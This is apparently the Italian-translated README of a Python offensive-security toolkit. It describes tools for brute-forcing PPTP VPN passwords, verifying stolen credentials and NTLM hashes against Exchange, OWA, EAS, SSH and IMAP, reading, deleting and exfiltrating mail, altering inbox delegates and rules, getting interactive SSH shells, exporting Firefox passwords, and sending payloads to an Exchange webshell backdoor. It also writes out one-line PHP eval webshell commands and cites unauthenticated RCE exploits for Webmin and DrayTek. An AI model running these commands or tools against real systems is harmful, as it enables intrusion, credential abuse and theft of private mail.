
Codici Python del mio blog.
Codici Python del mio blog.
Usa un attacco di forza bruta per ottenere la password della VPN PPTP.
Legge le password dal file (chiamato wordlist) e poi usa pptpsetup per connettersi al server.
L'intervallo di tempo è di 10 secondi.
Usato per scansionare le porte.
Il timeout è di 3 secondi.
versione C++:
https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp
Usato per ottenere l'IP da un URL.
Posso usare direttamente il risultato di Sublist3r.
Usato per rimuovere gli IP duplicati dal risultato di Sublist3r.
Posso usare direttamente il risultato di urltoip.py.
Gli IP possono essere ordinati usando Sublime (F9).
Usato per rimuovere elementi duplicati da un file.
Riferimento:
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
Usato per chiamare l'API di fofa e stampare gli IP dai risultati.
Puoi ottenere 100 risultati.
Usato per chiamare l'API di fofa e stampare gli IP dai risultati.
Se sei VIP, ottieni 10000 risultati.
Riferimento:
https://seclists.org/fulldisclosure/2019/Sep/31
Es.
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php
Riferimento:
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w
Es.
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');
Usato per esportare la password di Firefox
Usato per ottenere la versione di Exchange.
Prima ottieni il BuildNumber dal codice sorgente dell'URL e poi ottieni la versione.
Riferimento:
Usato per scansionare la vulnerabilità SMBv3 RCE.
Il timeout è di 3 secondi.
Riferimento:
https://github.com/imjdl/CVE-2020-8515-PoC
CVE-2020-8515
I dispositivi DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta e Vigor300B 1.3.3_Beta, 1.4.2.1_Beta e 1.4.4_Beta consentono l'esecuzione remota di codice come root (senza autenticazione) tramite metacaratteri di shell verso l'URI cgi-bin/mainfunction.cgi..
Prodotti interessati:
Usa l'API SOAP di Zimbra per connettersi al server di posta Zimbra.
Uso:
Zimbra_SOAP_API.py <url> <username> <password> <mode>
modalità:
Es:
Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low
Usato per verificare la validità di un account di Exchange Web Service (supporta plaintext e ntlmhash)
Riferimento:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
Uso:
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash
Es.
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1
Usato per accedere ad Autodiscover.xml e ottenere la configurazione dell'utente (supporta plaintext e ntlmhash)
Uso:
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx
Es.
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting
Modalità extra di checkAutodiscover.py
Aggiunge un parametro
Usato per accedere a Exchange Web Service (supporta plaintext e ntlmhash)
Uso:
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname
Es.
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox
Usato per verificare credenziali SSH valide (supporta password e file di chiave privata)
Uso:
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile
Es.
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa
Esecuzione remota di comandi via SSH (supporta password e file di chiave privata)
Uso:
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell
Es.
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps
Usato per verificare la validità delle credenziali EAS (Exchange Server ActiveSync)
Uso:
easCheck.py <host> <user> <password>
Es.
easCheck.py 192.168.1.1 user1 password1
Usato per verificare la validità di un account Exchange connettendosi a OWA.
Uso:
checkOWA.py <url> <user> <password>
Usato per leggere le email connettendosi a OWA.
Uso:
owaManage.py <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment
Usa IMAP per connettersi al server di posta.
Uso:
imapManage.py <IMAP server> <username> <password> <command>
<command>:
CheckConfig get the folder name
SaveAttachOfInbox save the attachments of Inbox
SaveAttachOfSent save the attachments of Sent
DownloadAllMailOfInbox download all the mails of Inbox
DownloadAllMailOfSent download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig
Usato per implementare l'autenticazione NTLM e comunicare con execCmd.aspx
I dati di comunicazione sono codificati con Base64
Uso:
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami
Versione C#: SharpExchangeBackdoor.cs
Usato per inviare payload alla backdoor webshell di Exchange.
Supporta:
Uso:
<url> <user> <password> <mode> <path>
mode:
assemblyLoad
webshellWrite
es.